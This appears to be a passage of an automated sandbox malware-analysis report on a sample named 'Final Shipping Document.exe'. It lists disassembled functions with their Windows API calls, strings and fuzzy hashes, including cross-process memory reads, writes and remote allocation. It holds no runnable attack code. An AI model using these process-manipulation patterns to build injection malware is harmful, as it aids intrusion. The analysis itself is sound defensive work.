                                                              • Part of subcall function 00BC0242: LeaveCriticalSection.KERNEL32(00C7070C,?,00BB198B,00C72518,?,?,?,00BA12F9,00000000), ref: 00BC028A
                                                              • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                              • Part of subcall function 00BC00A3: __onexit.LIBCMT ref: 00BC00A9
                                                            • __Init_thread_footer.LIBCMT ref: 00C27BFB
                                                              • Part of subcall function 00BC01F8: EnterCriticalSection.KERNEL32(00C7070C,?,?,00BB8747,00C72514), ref: 00BC0202
                                                              • Part of subcall function 00BC01F8: LeaveCriticalSection.KERNEL32(00C7070C,?,00BB8747,00C72514), ref: 00BC0235
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                            • String ID: 5$G$Variable must be of type 'Object'.
                                                            • API String ID: 535116098-3733170431
                                                            • Opcode ID: d58f60b487baf2019f63a4d6fc6583a620e5d6bd6b9ed954c22594186c14d39e
                                                            • Instruction ID: 6eaae023dc6b296db55037e3ea1a54a0f9e60bc263cd9c478618dd433ee2d552
                                                            • Opcode Fuzzy Hash: d58f60b487baf2019f63a4d6fc6583a620e5d6bd6b9ed954c22594186c14d39e
                                                            • Instruction Fuzzy Hash: CB918A70A04219EFCB14EF94E8D19BDB7B1FF49300F108199F816AB6A2DB71AE41DB51
                                                            Function 00C02716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00C0B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C021D0,?,?,00000034,00000800,?,00000034), ref: 00C0B42D
                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C02760
                                                              • Part of subcall function 00C0B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C021FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00C0B3F8
                                                              • Part of subcall function 00C0B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00C0B355
                                                              • Part of subcall function 00C0B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C02194,00000034,?,?,00001004,00000000,00000000), ref: 00C0B365
                                                              • Part of subcall function 00C0B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C02194,00000034,?,?,00001004,00000000,00000000), ref: 00C0B37B
                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C027CD
                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C0281A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                            • String ID: @
                                                            • API String ID: 4150878124-2766056989
                                                            • Opcode ID: 05149301e5923c0218c3e1a930707fc610bfbcedfab1b74582822b790317ced0
                                                            • Instruction ID: e2a8df74d1264c4c9f20b45999cbe21c5d23a7c7b93a581ef63facd8a462fb00
                                                            • Opcode Fuzzy Hash: 05149301e5923c0218c3e1a930707fc610bfbcedfab1b74582822b790317ced0
                                                            • Instruction Fuzzy Hash: 34411B76900218AFDB10DFA4CD86BEEBBB8AF09700F108095FA55B7191DB706F45DBA1
                                                            Function 00BD172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Final Shipping Document.exe,00000104), ref: 00BD1769
                                                            • _free.LIBCMT ref: 00BD1834
                                                            • _free.LIBCMT ref: 00BD183E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _free$FileModuleName
                                                            • String ID: C:\Users\user\Desktop\Final Shipping Document.exe
                                                            • API String ID: 2506810119-2946767437
                                                            • Opcode ID: 8ad7a1ca8e9ee5b7e70e3ed3caf2b9168da0b5b0376b72a3abbf79e3839df700
                                                            • Instruction ID: 00b63d2289d0ec3b913b9b03172150365ea773c9383adc7f4e35c402db33addb
                                                            • Opcode Fuzzy Hash: 8ad7a1ca8e9ee5b7e70e3ed3caf2b9168da0b5b0376b72a3abbf79e3839df700
                                                            • Instruction Fuzzy Hash: A1319CB5A00248BBDB21DB9D9885E9EFBFCEB85310B1445E7F80497321E6708E80DB90
                                                            Function 00C0C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00C0C306
                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 00C0C34C
                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00C71990,015E64B8), ref: 00C0C395
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Menu$Delete$InfoItem
                                                            • String ID: 0
                                                            • API String ID: 135850232-4108050209
                                                            • Opcode ID: d04f42c04cd5929287a23ee1f4115a2de681169ce16dfe64838f2ae557229ce5
                                                            • Instruction ID: fdfa5f3334d085cd5b069189f1f650456f77e8ad39ca2ae8047e27b74cfaa86b
                                                            • Opcode Fuzzy Hash: d04f42c04cd5929287a23ee1f4115a2de681169ce16dfe64838f2ae557229ce5
                                                            • Instruction Fuzzy Hash: F1417C312143019FDB20DF25D8C4B9EBBE4AB85320F148B5EF9A5972E1D730EA04DB62
                                                            Function 00C34416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00C3CC08,00000000,?,?,?,?), ref: 00C344AA
                                                            • GetWindowLongW.USER32 ref: 00C344C7
                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C344D7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$Long
                                                            • String ID: SysTreeView32
                                                            • API String ID: 847901565-1698111956
                                                            • Opcode ID: dbe4d67f5998f918d1105d9fb7bd04e6d471441017d679d358c383a2a8e963fc
                                                            • Instruction ID: 6a5b270b58ab4e2663549b3b1e6c47aa9ce1201763999c9517ab0dc35f90e8b7
                                                            • Opcode Fuzzy Hash: dbe4d67f5998f918d1105d9fb7bd04e6d471441017d679d358c383a2a8e963fc
                                                            • Instruction Fuzzy Hash: BA318B32220205AFDB249E38DC85BEA7BA9EB09334F204725F979E21E0D770ED509B50
                                                            Function 00C2304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00C2335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00C23077,?,?), ref: 00C23378
                                                            • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C2307A
                                                            • _wcslen.LIBCMT ref: 00C2309B
                                                            • htons.WSOCK32(00000000,?,?,00000000), ref: 00C23106
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                            • String ID: 255.255.255.255
                                                            • API String ID: 946324512-2422070025
                                                            • Opcode ID: 331a431b93b247596c551ddac7e9eed140ab169b56fc607aa9faf29cb7cb803d
                                                            • Instruction ID: 4098ebcfba9ccdc37f1c3695bcc2bb377ec2a0ced45a6302347ca9f3c9c07069
                                                            • Opcode Fuzzy Hash: 331a431b93b247596c551ddac7e9eed140ab169b56fc607aa9faf29cb7cb803d
                                                            • Instruction Fuzzy Hash: 7431E4352042A19FCB10CF68D485FA977E0EF54318F248099E8258BB92CB79DF41C771
                                                            Function 00C34653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00C34705
                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00C34713
                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00C3471A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$DestroyWindow
                                                            • String ID: msctls_updown32
                                                            • API String ID: 4014797782-2298589950
                                                            • Opcode ID: e9dd0a124faf54cdd79805f33bcd5ded5f451ced5822efc2a68a74c70c4d6fbb
                                                            • Instruction ID: 9ae51823dabf94eee500964f8eb16bc3e2515e1b8795ae1c3cb4a3194380a4ff
                                                            • Opcode Fuzzy Hash: e9dd0a124faf54cdd79805f33bcd5ded5f451ced5822efc2a68a74c70c4d6fbb
                                                            • Instruction Fuzzy Hash: FB215CB5610208AFDB14DF68DCD1EAB37ADEB5A3A4B040059FA149B291CB70FD51CA60
                                                            Function 00C095AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                            • API String ID: 176396367-2734436370
                                                            • Opcode ID: 251458b8635a2b69b3e2f71d0cfdfec197eac90a0808d7c5b498fc490a270542
                                                            • Instruction ID: ef4fe21b12cf4fc87903da8a633e737f738678e5b29aba922b1daeb99915007f
                                                            • Opcode Fuzzy Hash: 251458b8635a2b69b3e2f71d0cfdfec197eac90a0808d7c5b498fc490a270542
                                                            • Instruction Fuzzy Hash: 2D212B72208511A7D731BB299C02FB773D8DF55310F14442AF959971C3EBB29E41D2D5
                                                            Function 00C337B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00C33840
                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00C33850
                                                            • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00C33876
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$MoveWindow
                                                            • String ID: Listbox
                                                            • API String ID: 3315199576-2633736733
                                                            • Opcode ID: 663084757383357f7672f216179744eab3d5ffd790660410bb8be62a0d1c101c
                                                            • Instruction ID: 5e6e4831bd33944cce6628fc16a0b50c54dfd4668558bc5abaaf25e16aab5c33
                                                            • Opcode Fuzzy Hash: 663084757383357f7672f216179744eab3d5ffd790660410bb8be62a0d1c101c
                                                            • Instruction Fuzzy Hash: F421CF72620218BBEF218F54CC85FBF376EEF8A764F118125FA149B190C671DD528BA0
                                                            Function 00C149F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 00C14A08
                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C14A5C
                                                            • SetErrorMode.KERNEL32(00000000,?,?,00C3CC08), ref: 00C14AD0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$InformationVolume
                                                            • String ID: %lu
                                                            • API String ID: 2507767853-685833217
                                                            • Opcode ID: a7bf450651168278c408253d37933115a443018dbb2ee250994358b2d379398e
                                                            • Instruction ID: 2272b1026f7e20fcf683b5f03194e8c16eced6a656ebdbe8204faf4e49850ba0
                                                            • Opcode Fuzzy Hash: a7bf450651168278c408253d37933115a443018dbb2ee250994358b2d379398e
                                                            • Instruction Fuzzy Hash: 70319175A00109AFDB10DF54C881EAE7BF8EF09308F1480A5F909EB252D771EE45DB61
                                                            Function 00C341EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00C3424F
                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00C34264
                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00C34271
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: msctls_trackbar32
                                                            • API String ID: 3850602802-1010561917
                                                            • Opcode ID: cbd858fbd2eaa24ac50818df3775eaea653e1b72237b6adcc4de7fca7c92f9b7
                                                            • Instruction ID: 9e814899e714897025e89921477b00a6a0d3dfa114b063c9e283c74935c8c42d
                                                            • Opcode Fuzzy Hash: cbd858fbd2eaa24ac50818df3775eaea653e1b72237b6adcc4de7fca7c92f9b7
                                                            • Instruction Fuzzy Hash: CB11C671250248BFEF205F69CC46FAB3BACEF95B54F110524FA55E60A0D672EC519B10
                                                            Function 00C02F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BA6B57: _wcslen.LIBCMT ref: 00BA6B6A
                                                              • Part of subcall function 00C02DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C02DC5
                                                              • Part of subcall function 00C02DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C02DD6
                                                              • Part of subcall function 00C02DA7: GetCurrentThreadId.KERNEL32 ref: 00C02DDD
                                                              • Part of subcall function 00C02DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00C02DE4
                                                            • GetFocus.USER32 ref: 00C02F78
                                                              • Part of subcall function 00C02DEE: GetParent.USER32(00000000), ref: 00C02DF9
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00C02FC3
                                                            • EnumChildWindows.USER32(?,00C0303B), ref: 00C02FEB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                            • String ID: %s%d
                                                            • API String ID: 1272988791-1110647743
                                                            • Opcode ID: eec4165bb7ae141b7d65f1d4dd3a49746c7a807b852d9c6a380d478e29bac77f
                                                            • Instruction ID: b4b8ecb6d6a6aa27dd643aed4bba8b6e797467d2c396abcb1e52b458dd443ce4
                                                            • Opcode Fuzzy Hash: eec4165bb7ae141b7d65f1d4dd3a49746c7a807b852d9c6a380d478e29bac77f
                                                            • Instruction Fuzzy Hash: 0C1172716002056BCF157F649CCAFED77AAAF95304F044075BA09AB192DE709A45DB70
                                                            Function 00C35882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00C358C1
                                                            • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00C358EE
                                                            • DrawMenuBar.USER32(?), ref: 00C358FD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Menu$InfoItem$Draw
                                                            • String ID: 0
                                                            • API String ID: 3227129158-4108050209
                                                            • Opcode ID: 9209c532eb307781db8d77f3ae58e265cc39c5bf81a464fa4778fd9aafe3d611
                                                            • Instruction ID: 30e101c444470bae442b3506fbc3b6b9aa4b6d27a737faba03fcee13a4a619f5
                                                            • Opcode Fuzzy Hash: 9209c532eb307781db8d77f3ae58e265cc39c5bf81a464fa4778fd9aafe3d611
                                                            • Instruction Fuzzy Hash: 18016972520218EFDB219F21DC44BFEBBB4FB45360F1080A9E849E6151DB708A95EF21
                                                            Function 00BFD3AC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00BFD3BF
                                                            • FreeLibrary.KERNEL32 ref: 00BFD3E5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeLibraryProc
                                                            • String ID: GetSystemWow64DirectoryW$X64
                                                            • API String ID: 3013587201-2590602151
                                                            • Opcode ID: 26eba1617530efadedc704099b96bbff56f097d0d52f77b1a0939bc82807726e
                                                            • Instruction ID: 767de14f08b4e44d912c147f8d49315c5cdf8d0b5c2ce64b0e4083477a5f108a
                                                            • Opcode Fuzzy Hash: 26eba1617530efadedc704099b96bbff56f097d0d52f77b1a0939bc82807726e
                                                            • Instruction Fuzzy Hash: 19E04F7290252A9BD6715710CCD4BBE72E5AF10B01F8445D4FA02F7148EB64CD086BD5
                                                            Function 00C0007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a7ec8244e8bea8500c760ef220877795a57e01db9042bd377f6d45528f157712
                                                            • Instruction ID: 19abc86af8ad034c24ed1347fc445eee32b25baf650a3249c10215a703b6a5b5
                                                            • Opcode Fuzzy Hash: a7ec8244e8bea8500c760ef220877795a57e01db9042bd377f6d45528f157712
                                                            • Instruction Fuzzy Hash: 19C13A75A0020AEFDB15CF94C898BAEB7B5FF48704F218598E515EB2A1D731DE81CB90
                                                            Function 00C2342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
